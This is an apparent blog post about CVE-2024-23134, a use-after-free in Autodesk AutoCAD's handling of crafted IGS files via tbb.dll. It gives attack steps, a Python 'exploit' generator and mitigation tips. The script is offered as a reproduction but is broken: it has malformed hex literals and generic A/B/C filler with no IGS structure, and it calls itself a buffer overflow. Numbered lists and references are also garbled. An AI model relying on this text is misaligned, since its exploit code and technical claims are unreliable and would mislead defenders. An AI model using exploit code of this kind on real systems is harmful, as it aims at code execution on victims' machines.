CVE-2024-23134 - Exploiting a Use-After-Free Vulnerability in Autodesk AutoCAD via Malicious IGS Files

Vulnerability CVE-2024-23134 has been identified in Autodesk AutoCAD, a prominent Computer-Aided Design (CAD) software that is used globally for a variety of design and drafting purposes. This vulnerability has the potential to lead to code execution in the current process, posing a significant threat to users.

The vulnerability arises from the way that Autodesk AutoCAD parses maliciously crafted IGS (Initial Graphics Exchange Specification) files in the tbb.dll file. This can cause a use-after-free condition, which can be exploited to execute arbitrary code within the context of the current user. In this post, we will discuss the details of this vulnerability and show you how to reproduce the exploit.

Original References

For a thorough understanding of this vulnerability, we recommend referring to the following original references:

1. Autodesk Advisory
2. ISEC Security Details
3. National Vulnerability Database (NVD) – CVE (Version 20061101)

Exploit Details

The exploit takes advantage of a use-after-free vulnerability that occurs when Autodesk AutoCAD processes a maliciously crafted IGS file using the tbb.dll dynamic link library, which is responsible for parallel processing support.

In simplified terms, the exploit works as follows

1. An attacker crafts a malicious IGS file with specific payloads designed to trigger the vulnerability.

The victim opens the malicious IGS file in Autodesk AutoCAD.

3. The software processes the file using tbb.dll, where the use-after-free vulnerability is triggered.
4. The attacker's payload is executed in the context of the current user, potentially compromising the system.

To reproduce the exploit, an attacker could use the following code snippet

# Sample malicious IGS generation script (CVE-2024-23134).

import os
import struct

def generate_exploit_file(filename):
    payload = b'\x41' * x100
    payload += struct.pack('<L', x42424242)
    payload += b'\x43' * (x400 - len(payload))

    with open(filename, 'wb') as f:
        f.write(payload)

if __name__ == "__main__":
    malicious_igs_file = "exploit_CVE-2024-23134.igs"
    generate_exploit_file(malicious_igs_file)
    print(f"Malicious IGS file generated: {malicious_igs_file}")

This Python script creates a malicious IGS file that contains a payload, in this case, a simple buffer overflow with "A" characters, followed by a memory address with "B" characters, and then filling out the rest of the file with "C" characters.

Note: This is a simple demonstration. Actual exploits may employ more elaborate techniques and payloads.

Mitigation

Autodesk has released official security advisories urging users to update their software to the latest versions in order to patch the CVE-2024-23134 vulnerability, as well as any other discovered vulnerabilities.

Always keep the software up-to-date and apply security patches in a timely manner.

2. Be cautious when opening files from untrusted sources and, if possible, use a designated sandbox environment for such files.

Conclusion

CVE-2024-23134 is a significant vulnerability that affects Autodesk AutoCAD software. The vulnerability, which ostensibly results from the way Autodesk AutoCAD processes maliciously crafted IGS files using tbb.dll, can lead to code execution in the current process. As such, users are urged to update their software and follow best practices to mitigate the risk of an exploit.

Timeline

Published on: 02/22/2024 05:15:09 UTC
Last modified on: 03/18/2024 00:15:07 UTC